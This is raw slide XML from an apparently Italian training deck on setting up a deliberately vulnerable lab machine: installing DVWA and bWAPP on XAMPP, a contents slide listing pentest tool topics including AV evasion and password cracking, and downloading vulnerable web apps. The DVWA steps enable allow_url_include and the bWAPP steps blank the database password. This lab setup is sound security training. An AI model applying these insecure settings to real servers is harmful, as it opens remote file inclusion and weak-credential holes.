            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>/Reset DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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Configurare DVWA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Schermata del 2019-07-07 14-39-26.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="4167" t="18476" r="58333" b="26667"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="1752600"/>
            <a:ext cx="5334000" cy="4876800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6170612" y="2057400"/>
            <a:ext cx="556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it-IT" dirty="0" smtClean="0"/>
              <a:t>12.	La funzione “PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> allow_url_include “è disabilitata, per abilitarla torna su XAMPP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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Configurare DVWA</a:t>
            </a:r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6094412" y="2590800"/>
            <a:ext cx="5562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 startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>La funzione “PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> allow_url_include “è disabilitata, per abilitarla torna su XAMPP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Tasto destro su “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>” di Apache, e click su PHP (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5" descr="Schermata del 2019-07-07 14-42-02.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="57639" t="14444" r="2083" b="48889"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="455612" y="1981200"/>
            <a:ext cx="5223164" cy="2971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Configurare DVWA</a:t>
            </a:r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6094412" y="2590800"/>
            <a:ext cx="5562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 startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>La funzione “PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> allow_url_include “è disabilitata, per abilitarla torna su XAMPP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Tasto destro su “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>” di Apache, e click su PHP (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Cambiare “allow_url_include=Off” in </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>	“allow_url_include=On”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Schermata del 2019-07-07 14-43-39.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="43055" t="13333" r="15278" b="40000"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="2514600"/>
            <a:ext cx="5029200" cy="35204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Configurare DVWA</a:t>
            </a:r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6094412" y="2590800"/>
            <a:ext cx="5562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 startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>La funzione “PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> allow_url_include “è disabilitata, per abilitarla torna su XAMPP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Tasto destro su “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>” di Apache, e click su PHP (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Cambiare “allow_url_include=Off” in </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>	“allow_url_include=On”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>16. Salvare il file e chiudere</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>17.	Riavviare il server Apache per applicare le modifiche</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Schermata del 2019-07-07 14-43-39.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="43055" t="13333" r="15278" b="40000"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="2514600"/>
            <a:ext cx="5029200" cy="35204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Configurare DVWA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5" descr="Schermata del 2019-07-07 14-45-52.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="3472" t="10000" r="45833" b="21111"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="227012" y="1600200"/>
            <a:ext cx="5831758" cy="4953000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6094412" y="2590800"/>
            <a:ext cx="556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it-IT" dirty="0" smtClean="0"/>
              <a:t>18. Ricaricando la pagina ora il campo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>url_include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> risulta attivo.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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Configurare DVWA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Schermata del 2019-07-07 14-48-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5612" y="2438400"/>
            <a:ext cx="5559217" cy="3899647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6399212" y="5257800"/>
            <a:ext cx="525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alternativa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>questo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> video </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>spiega</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>configurazione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DVWA, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>passo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>passo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,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macchina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Windows 10 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=cak2lQvBRAo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Summary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2425" lvl="1" indent="-352425">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Creare una macchina vulnerabile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Download software e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>strumenti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>vulnerabili</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Configurare strumenti web</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-352425">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Penetration Testing Report</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="581025" lvl="2" indent="-352425">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> per la Ricerca di Vulnerabilità</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="581025" lvl="2" indent="-352425">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> per AV/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Evasion</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="581025" lvl="2" indent="-352425">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> per Exploit </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="581025" lvl="2" indent="-352425">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> Online Password Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="581025" lvl="2" indent="-352425">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId10" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Altri </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2200" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId10" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Tool</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns=""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Download e installazione BWAPP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rettangolo 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1827212" y="2971800"/>
            <a:ext cx="8537209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 smtClean="0"/>
              <a:t>Scarica</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BWAPPdal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sito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https://sourceforge.net/projects/bwapp/files/latest/download</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Decomprimere il file zip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Copiare la cartella “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>bWAPP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>” nel percorso \xampp\htdocs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Avviare XAMPP ed avviare i server Apache e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> ( se non già attivi)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Modificare il file “xampp\htdocs\bWAPP\admin\settings.php”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t> $db_password = "bug"; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>$db_password = "";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>salvare e chiudere l’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>editor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/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1674813" y="1828800"/>
            <a:ext cx="9067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BWAPP, buggy web application, è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>una</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> free open source insecure web application, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>distribuita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> per penetration testing.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Download e installazione BWAPP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rettangolo 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1598612" y="1600200"/>
            <a:ext cx="9296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 startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Aprire il browser alla pagina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://localhost/bWAPP/install.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cliccare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“Click here to install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bWAPP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Vai alla pagina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://localhost/bWAPP/login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>	credenziali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>bee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>/bug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Schermata del 2019-07-07 16-12-27.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect t="35478" b="3913"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1827212" y="3429000"/>
            <a:ext cx="8570259" cy="3124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Scaricare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>usu.war</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Infiniti.war</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rettangolo 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1446212" y="1905000"/>
            <a:ext cx="1005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 smtClean="0"/>
              <a:t>Usu.war</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Infiniti.war</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> sono due  Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
